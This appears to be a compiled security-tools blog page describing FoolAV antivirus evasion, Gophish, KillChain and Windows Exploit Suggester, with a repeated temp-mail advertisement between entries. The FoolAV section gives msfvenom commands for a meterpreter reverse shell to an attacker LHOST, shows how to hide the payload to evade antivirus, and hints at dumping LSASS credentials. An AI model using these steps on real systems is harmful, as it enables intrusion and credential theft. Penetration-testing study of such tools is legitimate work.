FoolAV – Pentest Tool for Antivirus Evasion & Running Arbitrary Payload on Target Wintel Host

FoolAV - Pentest Tool for Antivirus Evasion & Running Arbitrary Payload on Target Wintel Host

FoolAV is a tool for antivirus evasion and running arbitrary payload on target Wintel host.

It is useful during penetration tests where there is a need to execute some payload (meterpreter maybe?) while being certain that it will not be detected by antivirus software. The only requirement is to be able to upload two files:  binary executable  and  payload file  into the same directory.

Usage:

1. Prepare your payload (x86), i.e.

  • calc:  msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -e x86/shikata_ga_nai -b “x00x0ax0dxff” -f c 2>/dev/null | egrep “^”” | tr -d “”n;” >foolav.mf  (you dont really need to use any encoder or characters blacklisting, it will work anyway)
  • meterpreter:  msfvenom -p windows/meterpreter_reverse_tcp LHOST=… -a x86 -f c 2>/dev/null | egrep “^”” | tr -d “”n;” >foolav.mf 

2. Copy payload file  [executable-name-without-exe-extension].mf  in the same directory as executable payload running calc.exe generated using above command:

3. Once executable is run, payload file will be parsed, loaded into separate thread and executed in memory:

FoolAV Calc Screenshot

Notes:

  • x86 binary will run on both x86 and x86_64 Windows systems. Still, you need to use x86 architecture payloads. Nevertheless, x86 meterpreter payload can be migrated to x86_64 processes. After that,  load kiwi  will load x86_64 version making it possible to access juicy contents of LSASS process memory 🙂
FoolAV Meterpreter Screenshot
  • .mf payload file can be obfuscated – parser will ignore every character other than  xHH  hexdecimal sequences. This means, it can append your payload to almost any file, hide it between the lines or even add your own comments, example:
FoolAV.mf Screenshot


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Gophish – An Open-Source Phishing Toolkit

Gophish - An Open-Source Phishing Toolkit

Gophish is a powerful, open-source phishing framework that makes the simulation of real-world phishing attacks dead-simple.

The idea behind gophish is simple – make industry-grade phishing training available to everyone. “Available” in this case means two things:

  • Affordable – Gophish is open-source software that is completely free for anyone to use.
  • Accessible – Gophish is written in the Go programming language. This has the benefit that gophish releases are compiled binaries with no dependencies. In a nutshell, this makes installation as simple as “download and run”!

How To Install Gophish

Gophish is provided as a pre-built binary for most operating systems. With this being the case, installation is as simple as downloading the ZIP file containing the binary that is built for your OS and extracting the contents.

Building Gophish from Source

Since Gophish is written in the Go programming language, it is extremely simple to build from source. All you will need is the Go language and a C compiler (such as gcc).

To build gophish from source, simply run go get github.com/gophish/gophish. This downloads gophish into your $GOPATH.

Next, navigate to $GOPATH/src/github.com/gophish/gophish and run the command go build. This builds a gophish binary in the current directory.

Understanding the config.json

There are some settings that are configurable via a file called config.json, located in the gophish root directory. Here are some of the options that you can set to your preferences:

Be careful: Since the config.json file contains database credentials, you will want to ensure it is only readable by the correct user. For Linux users, you can do this using chmod 640 config.json.

Exposing Gophish to the Internet

By default, the phish_server.listen_url is configured to listen on all interfaces. This means that if the host Gophish is running on is exposed to the Internet (such as running on a VPS), the phishing server will be exposed to the Internet.

If you also want the admin server to be accessible over the Internet, you will need to change the entry for the admin_server.listen_url to 0.0.0.0:3333.

Be careful: Exposing the admin server to the Internet should only be used if needed. Before exposing the admin server to the Internet, it’s highly recommended to change the default password.

Using MySQL

The default database in Gophish is SQLite. This is perfectly functional, but some environments may benefit from leveraging a more robust database such as MySQL.

Support for Mysql has been added as of 0.3-dev. To setup Gophish for Mysql, a couple extra steps are needed.

Update config.json:

First, change the entries in config.json to match your deployment:

Example:

The format for the db_path entry is

Update MySQL Config:

Gophish uses a datetime format that is incompatible with MySQL >= 5.7. To fix this, Add the following lines to the bottom of /etc/mysql/mysql.cnf:

The above settings are the default modes for MySQL, but with NO_ZERO_IN_DATE and NO_ZERO_DATE removed.

Create the Database:

The last step you’ll need to do to leverage Mysql is to create the gophish database. To do this, log into mysql and run the command

After that, you’ll be good to go!

Now that you have gophish installed, you’re ready to run the software. To launch gophish, simply open a command shell and navigate to the directory the gophish binary is located.

Then, execute the gophish binary. You will see some informational output showing both the admin and phishing web servers starting up, as well as the database being created. This output will tell you the port numbers you can use to connect to the web interfaces.

To run Gophish as a service in Linux distributions, you will need to setup a service script. You can refer to this Github issue for an example implementation.

Now that you have gophish installed, you’re ready to run the software. To launch gophish, simply open a command shell and navigate to the directory the gophish binary is located.

Then, execute the gophish binary. You will see some informational output showing both the admin and phishing web servers starting up, as well as the database being created. This output will tell you the port numbers you can use to connect to the web interfaces.

 If your phishing server is set to run on TCP port 80, then you may need to run Gophish as an administrator so that it can bind to the privileged port.

to reach the login page.


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

KillChain – A Unified Console To Perform The “Kill Chain” Stages of Attacks

Kill Chain Setup:

Installing Killchain.py:

sudo apt-get update
sudo apt-get install websploit openvas veil-evasion tor
sudo git clone https://github.com/ruped24/killchain.git
cd killchain
chmod +x killchain.py
sudo ./killchain.py

Once the installation is complete:
Go through the options on the menu:

OpenVas takes a while on first run. Go get a coffee or two. You can launch multi Kill 
Chain sessions. No need to watch paint dry. Once OpenVas setup has completed; Reset 
openvas web interface admin password by running the commands below in an external 
terminal.
sudo openvas-start
sudo openvasmd --user=admin --new-password=
Point your browser to https://localhost:9392

Login Username = admin

Login Password = Your_new_reset_admin_password
Note on Veil-Evasion: Veil will complete the setup upon launch. Accept all the defaults. 
This takes a while. Don't leave the screen tho, there's dialog you will have to click 
through. Once it’s complete, it will auto launch.

Websploit: To exit websploit, type exit.

Metasploit: To exit Metasploit, type exit.

WiFite: It’s for site survey within the framework of this console.

Run wifite in an external terminal to do wireless attacks against the target.


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Windows Exploit Suggester – Tool To Detect Potential Missing Patches & Find Exploits

[*]

Windows Exploit Suggester - Tool To Detect Potential Missing Patches & Find Exploits

Windows Exploit Suggester is a Python-based tool that compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

It requires the ‘systeminfo’ command output from a Windows host in order to compare that the Microsoft security bulletin database and determine the patch level of the host.

It has the ability to automatically download the security bulletin database from Microsoft with the –update flag, and saves it as an Excel spreadsheet.

When looking at the command output, it is important to note that it assumes all vulnerabilities and then selectively removes them based upon the hotfix data. This can result in many false-positives, and it is key to know what software is actually running on the target host. For example, if there are known IIS exploits it will flag them even if IIS is not running on the target host.

The output shows either public exploits (E), or Metasploit modules (M) as indicated by the character value.

It was heavily inspired by Linux_Exploit_Suggester by Pentura.

USAGE:

Update the database

$ ./windows-exploit-suggester.py --update
[*] initiating...
[*] successfully requested base url
[*] scraped ms download url
[+] writing to file 2014-06-06-mssb.xlsx
[*] done

Install dependencies
(install python-xlrd, $ pip install xlrd –upgrade)

feed it “systeminfo” input, and point it to the Microsoft database

$ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1
-systeminfo.txt 
[*] initiating...
[*] database file detected as xls or xlsx based on extension
[*] reading from the systeminfo input file
[*] querying database file for potential vulnerabilities
[*] comparing the 15 hotfix(es) against the 173 potential bulletins(s)
[*] there are now 168 remaining vulns
[+] windows version identified as 'Windows 7 SP1 32-bit'
[*] 
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of 
Privilege (2880430) - Important
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code 
Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of 
Privilege (2778930) - Important
[*] done

possible exploits for an operating system can be used without hotfix data

$ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --ostext 'windows 
server 2008 r2' 
[*] initiating...
[*] database file detected as xls or xlsx based on extension
[*] getting OS information from command line text
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 196 potential bulletins(s)
[*] there are now 196 remaining vulns
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of 
Privilege (2778930) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege 
(2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation 
of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution 
(2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation 
of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege 
(981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical

LIMITATIONS:

Currently, if the ‘systeminfo’ command reveals ‘File 1’ as the output for the hotfixes, it will not be able to determine which are installed on the target. If this occurs, the list of hotfixes will need to be retrieved from the target host and passed in using the –hotfixes flag

It currently does not separate ‘editions’ of the Windows OS such as ‘Tablet’ or ‘Media Center’ for example, or different architectures, such as Itanium-based only

False positives also occur where it assumes EVERYTHING is installed on the target Windows operating system. If you receive the ‘File 1’ output, try executing ‘wmic qfe list full’ and feed that as input with the –hotfixes flag, along with the ‘systeminfo’.


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.